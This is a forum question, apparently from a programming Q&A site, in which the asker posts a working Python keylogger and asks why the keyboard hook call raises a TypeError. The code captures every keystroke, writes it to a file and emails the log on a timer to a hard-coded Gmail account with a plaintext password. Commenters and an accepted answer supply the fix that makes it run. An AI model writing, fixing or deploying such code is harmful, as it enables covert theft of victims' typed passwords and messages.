# Hello, i have problem with my code, what i do correct?

Tags: python, keylogger

i have problem with my code, what i do correct?
What is wrong with keyboard_callback?

```
> import keyboard 
> import smtplib from threading  
> import Semaphore, Timer
> 
> REPORT_TIME = 1200
> EMAIL_ADDRESS = "mail95069a@gmail.com" 
> EMAIL_PASSWORD = "password123"
> 
> class Keylogger:
>     def __init__(self, interval):
>         self.interval = interval
>         self.log = ""
>         self.semaphore = Semaphore(0)
> 
>     def keyboard_callback(self, event):
>         name = event.name
>         if len(name) > 1:
>             if name == "space":
>                 name = " "
>             elif name == "enter":
>                 name = "[ENTER]\n"
>             elif name == "decimal":
>                 name = "."
>             else:
>                 name = name.replace(" ", "_")
>                 name = f"[{name.upper()}]"
> 
>         self.log += name
>         output = open("output.txt", "w+")
>         output.write(self.log)
> 
>     def send_gmail(self, email, password, message):
>         server = smtplib.SMTP(host="smtp.gmail.com", port=587)
>         server.starttls()
>         server.login(email, password)
>         server.send_gmail(email, email, message)
>         server.quit()
> 
>     def report(self):
>         if self.log:
>             self.send_gmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
>         self.log = ""
>         Timer(interval=self.interval, function=self.report).start()
> 
>     def start(self):
>         keyboard.on_release(keyboard_callback=self.keyboard_callback)
>         self.report()
>         self.semaphore.acquire()
> 
> 
> if __name__ == "__main__":
>     keylogger = Keylogger(interval=REPORT_TIME)
>     keylogger.start()
```

Traceback (most recent call last):

Process finished with exit code 1
File "C:/Users/Keylogger.py", line 58, in

```
    keylogger.start()
```

File "C:/Users/Keylogger.py", line 51, in start

```
    keyboard.on_release(keyboard_callback=self.keyboard_callback)
TypeError: on_release() got an unexpected keyword argument 'keyboard_callback'
```

Comment: Does the function definition of ```on_release()``` say that it accepts the keyword argument ?

Comment: you specify the keyboard callback just by using the function name.  i.e. ```on_release(self.keyboard_callback)```

Answer (score 0, accepted):

```
...
def start(self):
        keyboard.on_release(callback=self.keyboard_callback)
        self.report()
        self.semaphore.acquire()
...
```